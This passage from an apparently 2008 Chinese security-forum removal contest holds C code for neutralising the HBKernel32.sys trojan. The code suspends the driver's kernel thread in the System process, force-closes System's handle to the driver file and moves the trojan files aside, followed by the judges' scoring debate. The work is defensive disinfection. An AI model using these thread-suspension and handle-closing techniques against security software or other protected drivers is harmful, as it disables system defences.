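int s5()
{
    s5_move_out("\\system.exe", "\\2132378.sh");
    s5_move_out("\\HBQQXX.dll", "\\9345834.sh");
    s5_move_out("\\drivers\\HBKernel32.sys", "\\5475451.sh");

    return 1;
}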
 
 
 
/*
 * Program entry (linked with /entry:start, no CRT): run the cleanup steps in order,
 * stop at the first one that fails, report the outcome in a single message box and
 * exit the process. s0 has no failure mode and always runs.
 */
void start()
{
    const char *outcome = "完成";

    s0();
    if (s1() == 0)
        outcome = "HBkernel32可能不存在";
    else if (s2() == 0)
        outcome = "加载killhb驱动失败";
    else if (s3() == 0)
        outcome = "清理system.exe失败";
    else if (s4() == 0)
        outcome = "清理注册表失败";
    else if (s5() == 0)
        outcome = "清理尸体失败";

    MessageBox(0, outcome, "killhb", 0);
    ExitProcess(0);
}


附件是编译好的
执行驱动线程停了,system.exe进程杀了,注册表干净了,尸体都放到temp目录了,即木马功能都没了。 重启后更健康
上传的附件:
2008-10-29 11:40
3
shooo多来几种方法
2008-10-29 17:21
4
不着急, 等你们出了详细规则再做不迟
2008-10-29 17:54
5
贴一个纯3环的方法,应该nt各平台通用的
驱动文件删掉, 注册表清掉,垃圾文件清掉, 不需要重启

p.s. 物理内存, ZwSystemDebugControl, gdt之流都是旁门左道,我就不贴这些了

主要代码片断
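/*
 * Pure ring-3 neutralisation of the resident HBKernel32.sys (no helper driver):
 * suspend the driver's kernel thread and close the System process's handle to the
 * driver file so the file can be deleted without a reboot.
 *
 * Returns 1 when System's handle to HBKernel32.sys was closed, 0 when no such handle
 * was found, and a negative step code on failure:
 *   -1/-2/-3  SeDebugPrivilege setup,   -4  System process not found,
 *   -5        HBKernel32.sys not loaded, -6  OpenProcess(System) failed,
 *   -7        no System thread starts inside the driver image, -8 OpenThread failed,
 *   -9        out of memory during handle enumeration.
 *
 * All structure offsets used here (0x11C module entries; process records with
 * NextEntryOffset +0x00, NumberOfThreads +0x04, UniqueProcessId +0x44 and 0x40-byte
 * thread records from +0xB8; 0x10-byte handle entries; object type 0x1C == File) are
 * those of 32-bit XP-era SystemModuleInformation / SystemProcessInformation /
 * SystemHandleInformation and are not portable across NT versions.
 *
 * The driver thread is suspended, not terminated, so the driver image stays in memory
 * (the point raised by the judges later in this thread).
 *
 * Fixes over the original: hToken leak on the -3 path; unchecked snapshot and
 * VirtualAlloc results; the process-list walk spun forever when NextEntryOffset
 * reached 0 (dwPid absent, or a failed query leaving the buffer zeroed); OpenThread is
 * called through a typed pointer instead of inline asm.
 */
int s2()
{
    // Enable SeDebugPrivilege so the System process can be opened below.
    HANDLE hToken;
    TOKEN_PRIVILEGES priv = {1, {0, 0, SE_PRIVILEGE_ENABLED}};
    if (!LookupPrivilegeValue(NULL, "SeDebugPrivilege", &priv.Privileges[0].Luid))
    {
        return -1;
    }
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, &hToken))
    {
        return -2;
    }
    if (!AdjustTokenPrivileges(hToken, FALSE, &priv, sizeof(priv), 0, 0))
    {
        CloseHandle(hToken);
        return -3;
    }
    // NOTE(review): AdjustTokenPrivileges reports success even when the privilege was not
    // granted (ERROR_NOT_ALL_ASSIGNED); a non-admin caller then fails later with -6.
    CloseHandle(hToken);

    // Find the System process, which owns the driver's thread and its file handle.
    HANDLE  hC;
    DWORD   dwPid = 0;
    BOOL    bNext;
    PROCESSENTRY32 p32 = {sizeof(p32)};
    hC = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
    if (hC == INVALID_HANDLE_VALUE)
    {
        return -4;
    }
    bNext = Process32First(hC, &p32);
    while (bNext)
    {
        if (lstrcmpi(p32.szExeFile, "SYSTEM") == 0)
        {
            dwPid = p32.th32ProcessID;
            break ;
        }
        bNext = Process32Next(hC, &p32);
    }
    CloseHandle(hC);
    if (dwPid == 0)
    {
        return -4;
    }

    // Locate the HBKernel32.sys image via SystemModuleInformation (class 11): a 4-byte
    // count followed by 0x11C-byte entries with ImageBase +0x08, ImageSize +0x0C and a
    // 256-byte FullPathName at +0x1C.
    DWORD   HBBase = 0;
    DWORD   HBSize = 0;
    char    *offset;
    int     Status;
    LPBYTE  buf = NULL;
    DWORD   dwSize = 0x2000;
    DWORD   i;
    do
    {
        dwSize *= 2;
        if (buf)
        {
            VirtualFree(buf, 0, MEM_RELEASE);
        }
        buf = (LPBYTE)VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
        if (buf == NULL)
        {
            return -5;
        }
        Status = ZwQuerySystemInformation(11, buf, dwSize, NULL);
    } while (Status == 0xC0000004);         // STATUS_INFO_LENGTH_MISMATCH: grow and retry
    if (Status == 0)
    {
        for (i=0; i<*(LPDWORD)buf; i++)
        {
            char *entry = (char *)buf + 4 + i*0x11C;
            offset = strrchr(entry + 0x1C, '\\');
            offset = (offset != NULL) ? offset + 1 : entry + 0x1C;
            if (lstrcmpi(offset, "HBKernel32.sys") == 0)
            {
                HBBase = *(PULONG)(entry + 0x08);
                HBSize = *(PULONG)(entry + 0x0C);
                break ;
            }
        }
    }
    VirtualFree(buf, 0, MEM_RELEASE);
    if (HBBase == 0)
    {
        return -5;
    }

    // Open System for handle duplication only; PROCESS_DUP_HANDLE is all DuplicateHandle needs.
    HANDLE  hProcess;
    hProcess = OpenProcess(PROCESS_DUP_HANDLE, FALSE, dwPid);
    if (hProcess == NULL)
    {
        return -6;
    }

    // Find the driver's worker thread via SystemProcessInformation (class 5): the System
    // thread whose StartAddress (+0x1C in its 0x40-byte record) lies inside the driver image.
    DWORD   StartAddress;
    DWORD   dwTid = 0;
    buf = NULL;
    dwSize = 0x2000;
    do
    {
        dwSize *= 2;
        if (buf)
        {
            VirtualFree(buf, 0, MEM_RELEASE);
        }
        buf = (LPBYTE)VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
        if (buf == NULL)
        {
            CloseHandle(hProcess);
            return -7;
        }
        Status = ZwQuerySystemInformation(5, buf, dwSize, NULL);
    } while (Status == 0xC0000004);
    offset = (char *)buf;
    while (Status == 0)
    {
        DWORD next = *(LPDWORD)offset;      // NextEntryOffset; 0 marks the last record
        if (*(LPDWORD)(offset+0x44) == dwPid)
        {
            for (i=0; i<*(LPDWORD)(offset+0x04); i++)
            {
                StartAddress = *(LPDWORD)(offset+0xB8+i*0x40+0x1C);
                if (StartAddress>HBBase && StartAddress<(HBBase+HBSize))
                {
                    dwTid = *(LPDWORD)(offset+0xB8+i*0x40+0x24);    // ClientId.UniqueThread
                    break ;
                }
            }
            break ;
        }
        if (next == 0)
        {
            break ;
        }
        offset += next;
    }
    VirtualFree(buf, 0, MEM_RELEASE);
    if (dwTid == 0)
    {
        CloseHandle(hProcess);
        return -7;
    }

    // Suspend that thread. OpenThread is resolved at run time as in the original (which
    // invoked it from inline asm, presumably to avoid an import-library dependency).
    typedef HANDLE (__stdcall *open_thread_fn)(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwThreadId);
    open_thread_fn pOpenThread;
    HANDLE  hThread = NULL;
    pOpenThread = (open_thread_fn)GetProcAddress(GetModuleHandle("kernel32.dll"), "OpenThread");
    if (pOpenThread != NULL)
    {
        hThread = pOpenThread(THREAD_ALL_ACCESS, 0, dwTid);
    }
    if (hThread == NULL)
    {
        CloseHandle(hProcess);
        return -8;
    }
    SuspendThread(hThread);                 // left suspended; the driver image remains loaded
    CloseHandle(hThread);

    // Enumerate System's handles via SystemHandleInformation (class 16): a 4-byte count
    // followed by 0x10-byte entries with ProcessId +0x00, ObjectTypeNumber +0x04 and the
    // 16-bit handle value at +0x06.
    HANDLE  hHandle;
    HANDLE  hFile;
    IO_STATUS_BLOCK io;
    LPBYTE  FileName;
    wchar_t *wname;
    DWORD   count;
    int     qs;
    buf = NULL;
    dwSize = 0x2000;
    do
    {
        dwSize *= 2;
        if (buf)
        {
            VirtualFree(buf, 0, MEM_RELEASE);
        }
        buf = (LPBYTE)VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
        if (buf == NULL)
        {
            CloseHandle(hProcess);
            return -9;
        }
        Status = ZwQuerySystemInformation(16, buf, dwSize, NULL);
    } while (Status == 0xC0000004);
    count = (Status == 0) ? *(LPDWORD)buf : 0;

    FileName = (LPBYTE)VirtualAlloc(NULL, 0x1000, MEM_COMMIT, PAGE_READWRITE);
    if (FileName == NULL)
    {
        VirtualFree(buf, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        return -9;
    }
    for (i=0; i<count; i++)
    {
        LPBYTE entry = buf + 4 + i*0x10;
        if (*(LPDWORD)(entry+0x00) != dwPid)
            continue ;
        if (*(LPBYTE)(entry+0x04) != 0x1C)  // File object type index on the analysed build
            continue ;
        hHandle = (HANDLE)*(LPWORD)(entry+0x06);
        hFile = INVALID_HANDLE_VALUE;
        if (!DuplicateHandle(hProcess, hHandle, GetCurrentProcess(), &hFile, 0, FALSE, DUPLICATE_SAME_ACCESS))
            continue ;
        // FileNameInformation (class 9) returns {ULONG FileNameLength; WCHAR FileName[]}
        // with no terminator; the memset supplies the NUL that wcsrchr/wcsicmp rely on.
        // NOTE(review): this query can block on some handle types (e.g. synchronous
        // pipes); confirm on the target OS before running it against arbitrary handles.
        memset(FileName, 0, 0x1000);
        qs = ZwQueryInformationFile(hFile, &io, FileName, 0x1000, 9);
        if (qs == 0)
        {
            wname = wcsrchr((wchar_t *)(FileName+4), L'\\');
            if (wname != NULL && wcsicmp(wname + 1, L"HBkernel32.sys") == 0)
            {
                // Re-duplicate with DUPLICATE_CLOSE_SOURCE: this closes System's own handle
                // to the driver file, which is what lets HBKernel32.sys be deleted without
                // a reboot.
                CloseHandle(hFile);
                hFile = INVALID_HANDLE_VALUE;
                if (DuplicateHandle(hProcess, hHandle, GetCurrentProcess(), &hFile, 0, FALSE, DUPLICATE_SAME_ACCESS | DUPLICATE_CLOSE_SOURCE))
                {
                    CloseHandle(hFile);
                    VirtualFree(FileName, 0, MEM_RELEASE);
                    VirtualFree(buf, 0, MEM_RELEASE);
                    CloseHandle(hProcess);
                    return 1;
                }
                continue ;
            }
        }
        CloseHandle(hFile);
    }

    VirtualFree(FileName, 0, MEM_RELEASE);
    VirtualFree(buf, 0, MEM_RELEASE);
    CloseHandle(hProcess);

    return 0;
}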
上传的附件:
2008-10-30 10:42
6
shoooo 第三轮得分
方法: 2种
基础方法 ring3: 90分
ring3方法不需要重启: +10分
ring0方法: +10分
ring0方法不需要重启 +10分
文档的质量和代码规范性 + 4分

总得分 124分
2008-10-30 11:51
7
计算的相当完美,争取得满分
2008-10-30 23:22
8
基础方法 ring3: 90分
ring3方法不需要重启: +5分(驱动还在内存中)
ring0方法: +10分
ring0方法不需要重启 +5分(驱动还在内存中)
文档的质量和代码规范性 + 10分

总得分 120分
2008-11-11 22:56
9
楼上裁判
文档中说删除驱动文件,删除注册表,删除木马exe,dll是+10 分吧,并没有说 "驱动还在内存中只得5分"
2008-11-12 19:34
10
4、如果不需要重起的情况下,能完美删除驱动等释放文件,卸载驱动及dll模块,删除注册表,在上面的基础上,再加10分,加满150分为止;其余对重起没有要求。

有个卸载驱动!!!!
2008-11-12 19:40